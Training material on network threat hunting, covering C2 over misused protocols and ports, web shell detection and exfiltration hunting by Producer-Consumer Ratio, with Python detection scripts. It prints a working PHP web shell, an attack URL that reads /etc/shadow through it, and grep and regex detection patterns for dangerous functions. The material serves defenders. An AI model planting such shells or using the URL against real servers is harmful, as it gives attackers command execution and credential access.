Hunting for irregular traffic

Irregularities in network traffic are useful indicators for threat hunters

Malware authors use a variety of techniques to hide C2 traffic

  • Misused protocols

  • Port-application mismatches

Attackers also scan for existing web shells and plant their own as an initial access vector

Misused protocols

Common protocols are often misused for C2 since they are less likely to be detected and blocked

  • Most organizations allow DNS, HTTP, etc across network boundaries

Identification of protocol misuse requires knowledge of where data can be hidden in these protocols

  • DNS domains, HTTP header fields, etc

Detecting this type of C2 requires establishing what normal traffic looks like for each protocol, comparing observed traffic to that baseline and investigating the anomalies

  • "Rinse and repeat" works for more than just DNS: baseline, compare, investigate, refine, and run the same loop for HTTP, TLS, ICMP, etc.

Port-application mismatches

Port numbers are in the range 0-65535

  • 0-1023: System ports

  • 1024-49151: User port or registered ports

  • 49152-65535: Dynamic or private ports

Malware authors may use common (HTTPS, DNS, etc) or custom protocols for C2

Malware may mix and match common/uncommon ports and common/custom protocols

  • Common Protocol + Common Port

  • Common Protocol + Uncommon Port

  • Custom Protocol + Common Port

  • Custom Protocol + Uncommon Port

Look at log data (firewall, proxy, webserver and application) to find anomalies, e.g. a port that the firewall allows but whose payload the proxy or IDS does not recognise as the expected protocol
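As an added example (not part of the original slides), the following Python script classifies connection records into the four protocol/port quadrants above and flags every pairing that is not expected, which also catches the protocol misuse described in the previous section (an unrecognised payload on UDP/53 carrying large outbound volume). It assumes Zeek-style conn.log fields, where the service column is what Zeek identified from the payload rather than from the port number, and "-" means no protocol was recognised; the expected-port table and the log lines are constructed for illustration.

```python
"""Port/application mismatch hunt over constructed Zeek-style conn.log records."""
from collections import Counter

# Assumed policy: ports on which each recognised application protocol is expected.
# Tune this to the organisation's own baseline; it is an assumption here.
EXPECTED_PORTS = {
    "dns": {53}, "http": {80, 8080}, "ssl": {443, 8443},
    "ssh": {22}, "smtp": {25, 587}, "ntp": {123},
}
# "Common" ports in the sense of the slide: ports carrying well-known services.
COMMON_PORTS = set().union(*EXPECTED_PORTS.values())

# Constructed records (not real captures):
# ts, orig_h, orig_p, resp_h, resp_p, proto, service, orig_bytes, resp_bytes
SAMPLE_CONN_LOG = """\
1700000000.1\t10.0.0.5\t51234\t93.184.216.34\t443\ttcp\tssl\t1200\t8400
1700000001.2\t10.0.0.5\t51235\t203.0.113.9\t443\ttcp\tssh\t900\t300
1700000002.3\t10.0.0.7\t51236\t203.0.113.9\t4444\ttcp\thttp\t50000\t200
1700000003.4\t10.0.0.7\t51237\t203.0.113.10\t8081\ttcp\t-\t70000\t150
1700000004.5\t10.0.0.9\t51238\t198.51.100.2\t53\tudp\tdns\t60\t120
1700000005.6\t10.0.0.9\t51239\t198.51.100.2\t53\tudp\t-\t90000\t400
"""


def parse_conn_log(text):
    """Parse tab-separated conn.log-like lines into dicts; skips comments/blank lines."""
    rows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        f = line.split("\t")
        rows.append({
            "ts": float(f[0]), "orig_h": f[1], "orig_p": int(f[2]),
            "resp_h": f[3], "resp_p": int(f[4]), "proto": f[5],
            "service": f[6], "orig_bytes": int(f[7]), "resp_bytes": int(f[8]),
        })
    return rows


def classify(row):
    """Return (quadrant, reason). reason == "expected" means nothing to hunt."""
    port, svc = row["resp_p"], row["service"]
    common_port = port in COMMON_PORTS
    known_proto = svc in EXPECTED_PORTS
    if known_proto and common_port:
        if port in EXPECTED_PORTS[svc]:
            return "common_proto/common_port", "expected"
        # e.g. SSH on 443: both are "common", but the pairing is wrong.
        return "common_proto/common_port", f"{svc} on port {port} (mismatch)"
    if known_proto:
        return "common_proto/uncommon_port", f"{svc} on port {port}"
    if common_port:
        return "custom_proto/common_port", f"unrecognised payload on port {port}"
    return "custom_proto/uncommon_port", f"unrecognised payload on port {port}"


def hunt(rows):
    """Return the rows worth investigating, annotated with quadrant and reason."""
    hits = []
    for row in rows:
        quadrant, reason = classify(row)
        if reason != "expected":
            hits.append({**row, "quadrant": quadrant, "reason": reason})
    return hits


if __name__ == "__main__":
    rows = parse_conn_log(SAMPLE_CONN_LOG)
    hits = hunt(rows)
    print("quadrant counts:", Counter(h["quadrant"] for h in hits))
    for h in hits:
        print(f'{h["orig_h"]} -> {h["resp_h"]}:{h["resp_p"]}  '
              f'{h["quadrant"]:26} {h["reason"]}  out={h["orig_bytes"]}B')
```

Sorting the hits by orig_bytes puts the two large-outbound connections (HTTP on 4444 and an unrecognised payload on 53) at the top, which is where the DNS-tunnel or custom C2 candidates usually sit. Without payload-based service identification (e.g. a firewall log that only has ports) the "custom protocol" rows cannot be distinguished, so a proxy or IDS log is needed for the full matrix.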

Web shells

Web shells are scripts planted on a web server that give an attacker an undocumented way to execute commands on the host through a dynamic server-side page

Traditionally, these web shells were simple and easy to detect

Sophisticated web shells include methods to interact with the console, edit files, manage databases, etc.

  • The C99 shell (almost a decade old) has several features:

    • SQL Manager

    • Visual File Manager (many features)

    • PHP Eval

    • Mail Bomber

    • Get all readable home directories

Example (the classic simple-backdoor.php)

    <?php
    // Whatever is passed in ?cmd= goes straight to the system shell
    if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
    }
    ?>

This shell is straightforward: any value passed in the cmd parameter is handed to the system shell, so an attacker only has to request a URL such as the fabricated example below to execute commands as the web server user:

  • http://compromised-system.com/simple-backdoor.php?cmd=cat+/etc/shadow

Detecting unencrypted web shells

Unobfuscated shells such as C99 can be detected with keyword searches or a signature-based detection tool

The following command (adapted from Steven Whitney) can be used to find candidate PHP backdoors by searching recursively for dangerous function names:

  • grep -RPn "(system|phpinfo|pcntl_exec|python_eval|base64_decode|gzip|mkdir|fopen|fclose|readfile|passthru)" /path/to/webdir/

This generates a huge number of false positives, as many of these calls are used by legitimate web applications; the hits still have to be triaged, e.g. by looking for files where a dangerous call and user-supplied input ($_REQUEST, $_GET, $_POST) appear together

Detecting customized web shells

Some web shells, like those generated with Weevely, implement mechanisms specifically aimed at avoiding signature detection

  • Uses compression and encryption for obfuscation, so the dangerous function names never appear in clear text

Finding web shells on enterprise web servers can be difficult due to the sheer volume of data

Tools exist to help detect customized web shells:

  • Part of threat hunting suites or vulnerability scanners (Nessus)

  • Standalone tools (Webshell Scan, Scalp, NeoPI)
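As an added example (not part of the original slides and not the code of any of the tools listed above), the following Python scanner combines the keyword approach with the kind of statistical indicators NeoPI-style tools use: it only flags a file when a dangerous call co-occurs with user-supplied input, or when obfuscation indicators (a long encoded string, a variable function call) accumulate, and it reports Shannon entropy for the analyst to sort on. The three PHP files it writes into a temporary directory are constructed samples; the indicator regexes, the encoded blob and the scoring threshold are assumptions, not a published ruleset.

```python
"""Score PHP files for web shell indicators; constructed samples, hypothetical rules."""
import math
import os
import re
import tempfile

DANGEROUS = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|eval|assert|"
    r"base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(")
USER_INPUT = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\b|php://input|getallheaders\s*\(")
LONG_ENCODED = re.compile(r"['\"]([A-Za-z0-9+/=]{100,})['\"]")   # long base64-looking literal
VAR_FUNC = re.compile(r"\$\w+\s*\(")                               # $f(...) indirect call
PHP_EXT = (".php", ".phtml", ".inc", ".php5")


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; obfuscated/encoded payloads push this towards 6+."""
    if not data:
        return 0.0
    counts = {}
    for b in data:
        counts[b] = counts.get(b, 0) + 1
    return -sum((c / len(data)) * math.log2(c / len(data)) for c in counts.values())


def score_file(path):
    raw = open(path, "rb").read()
    text = raw.decode("utf-8", errors="replace")
    ind = {
        "dangerous_call": bool(DANGEROUS.search(text)),
        "user_input": bool(USER_INPUT.search(text)),
        "long_encoded_string": bool(LONG_ENCODED.search(text)),
        "variable_function": bool(VAR_FUNC.search(text)),
    }
    score = sum(ind.values())
    # Assumed rule: a sink fed by request data is enough; otherwise need >= 2 indicators.
    flagged = (ind["dangerous_call"] and ind["user_input"]) or score >= 2
    return {"path": path, "indicators": ind, "score": score,
            "entropy": round(shannon_entropy(raw), 3), "flagged": flagged}


def scan_webroot(root):
    results = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(PHP_EXT):
                results.append(score_file(os.path.join(dirpath, name)))
    return sorted(results, key=lambda r: (r["flagged"], r["score"], r["entropy"]), reverse=True)


# Constructed samples: a legitimate script that trips grep, the simple backdoor,
# and an obfuscated shell with a placeholder encoded blob (not real payload).
SAMPLES = {
    "legit.php": "<?php\nexec('ls /var/www/uploads', $out);\n"
                 "foreach ($out as $line) { echo htmlspecialchars($line); }\n",
    "simple-backdoor.php": "<?php\nif(isset($_REQUEST['cmd'])){ system($_REQUEST['cmd']); }\n",
    "obfuscated.php": "<?php\n$k=$_POST['k'];\n$f=base64_decode('c3lzdGVt');\n$f(stripslashes($k));\n"
                      "eval(gzinflate(base64_decode('" + "QUJD" * 40 + "')));\n",
}


def write_samples(root):
    for name, body in SAMPLES.items():
        with open(os.path.join(root, name), "w") as fh:
            fh.write(body)


def demo():
    """Write the samples to a temp dir, scan it, return results keyed by file name."""
    with tempfile.TemporaryDirectory() as root:
        write_samples(root)
        return {os.path.basename(r["path"]): r for r in scan_webroot(root)}


if __name__ == "__main__":
    for name, r in demo().items():
        print(f'{"FLAG" if r["flagged"] else "    "} {name:22} score={r["score"]} '
              f'entropy={r["entropy"]} {[k for k, v in r["indicators"].items() if v]}')
```

legit.php would be a grep hit (exec) but is not flagged here because nothing in the request reaches the call; the obfuscated sample is flagged even though "system" never appears in clear text, because request data, an indirect call and a long encoded literal occur together. Entropy is deliberately kept out of the verdict: it is a ranking aid for large web roots, and minified JavaScript or binary assets inflate it.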

Data exfiltration

Data exfiltration events are complex

Most pass through transport nodes (internal hosts used for staging and relaying) rather than going directly from the original data source

Overt and covert channels may be involved:

  • IP multicasting

  • Browser-based (e.g., DNS prefetching)

  • Tunneling: DNS, HTTP, XXX

  • Piggyback transporting (NTPv3, ICMP, etc)

Data Loss Prevention (DLP) solutions may miss exfiltration events:

  • Exfiltration exploits are often stepping stones and do not always touch DLP-protected data

  • Distributed exfiltration networks (many hosts each moving a small piece) are hard for DLP to detect

Producer-Consumer Ratio (PCR)

One way to hunt for exfiltration is by detecting a shift in the producer/consumer role of a network node

Producer-Consumer Ratio (PCR)

  • First introduced by Carter Bullard and John Gerth

  • All nodes are producers and consumers of data

  • For a given node and service, the ratio of produced versus consumed data (PCR) is normally consistent over time; a sudden shift is an anomaly worth investigating

PCR = \frac{SrcApplicationBytes - DstApplicationBytes}{SrcApplicationBytes + DstApplicationBytes}

Where ApplicationBytes = (TotalBytes - Sum(L[2,3,4] Headers)) - RetransBytes, so the ratio ranges from -1 (pure consumer) to +1 (pure producer)

Example: DNS could be an exfiltration channel. A DNS client normally consumes more than it produces (small queries, larger responses), so an increase in PCR for DNS towards +1 may be an indicator of exfiltration
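As an added example (not from the original slides or from Bullard and Gerth's own tooling), the following Python code computes PCR with the ApplicationBytes definition above over a set of constructed flow records, aggregates it per host and service for a baseline window and a current window, and flags the DNS shift described in the example. The flow records, the window labels and the shift threshold of 0.5 are assumptions chosen for illustration.

```python
"""Producer-Consumer Ratio shift hunt over constructed per-flow byte counts."""
from collections import defaultdict

# Assumed threshold: a PCR move of 0.5 or more between windows is worth a look.
SHIFT_THRESHOLD = 0.5


def app_bytes(total_bytes, header_bytes, retrans_bytes):
    """ApplicationBytes = (TotalBytes - Sum(L2/L3/L4 headers)) - RetransBytes."""
    return (total_bytes - header_bytes) - retrans_bytes


def pcr(src_app_bytes, dst_app_bytes):
    """PCR in [-1, +1]; 0 when no application data moved at all."""
    total = src_app_bytes + dst_app_bytes
    if total == 0:
        return 0.0
    return (src_app_bytes - dst_app_bytes) / total


# Constructed flows: host, service, window, then per-direction total/header/retrans bytes.
SAMPLE_FLOWS = [
    # 10.0.0.9 DNS, baseline: tiny queries, larger answers -> consumer
    dict(host="10.0.0.9", service="dns", window="baseline",
         src=(100, 40, 0), dst=(240, 40, 0)),
    dict(host="10.0.0.9", service="dns", window="baseline",
         src=(100, 40, 0), dst=(240, 40, 0)),
    # 10.0.0.9 DNS, current: 90 KB out in "queries" -> producer
    dict(host="10.0.0.9", service="dns", window="current",
         src=(90200, 200, 0), dst=(500, 100, 0)),
    # 10.0.0.5 TLS browsing, both windows: steady consumer
    dict(host="10.0.0.5", service="ssl", window="baseline",
         src=(1300, 200, 100), dst=(8300, 200, 100)),
    dict(host="10.0.0.5", service="ssl", window="current",
         src=(1500, 200, 100), dst=(8700, 200, 100)),
]


def aggregate_pcr(flows):
    """Sum application bytes per (host, service, window), then take the PCR of the sums."""
    sums = defaultdict(lambda: [0, 0])
    for f in flows:
        key = (f["host"], f["service"], f["window"])
        sums[key][0] += app_bytes(*f["src"])
        sums[key][1] += app_bytes(*f["dst"])
    return {key: pcr(s, d) for key, (s, d) in sums.items()}


def hunt_pcr_shift(flows, threshold=SHIFT_THRESHOLD):
    """Compare current vs baseline PCR per (host, service); flag large positive shifts."""
    per_window = aggregate_pcr(flows)
    report = {}
    for (host, service, window), value in per_window.items():
        report.setdefault((host, service), {})[window] = value
    for key, r in report.items():
        base, cur = r.get("baseline"), r.get("current")
        r["shift"] = None if base is None or cur is None else round(cur - base, 3)
        r["flagged"] = r["shift"] is not None and r["shift"] >= threshold
    return report


if __name__ == "__main__":
    for (host, service), r in hunt_pcr_shift(SAMPLE_FLOWS).items():
        print(f'{"FLAG" if r["flagged"] else "    "} {host:10} {service:4} '
              f'baseline={r.get("baseline", 0):+.3f} current={r.get("current", 0):+.3f} '
              f'shift={r["shift"]}')
```

Summing bytes before dividing (rather than averaging per-flow PCRs) keeps one large flow from being diluted by many tiny ones, which is exactly the pattern a DNS tunnel produces. Subtracting retransmitted bytes matters for the baseline: a lossy link would otherwise look like a producer without any new data leaving.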

Additional resources

The following resources on the Skills portal show some network-based threat hunting tools and analysis methods

Cyber threat hunting

  • Cyber-threat hunting - Hunting network-based threats

  • Cyber-threat hunting - Finding threats in .pcap files

  • Cyber-threat hunting - Detecting a port scan

Network traffic analysis
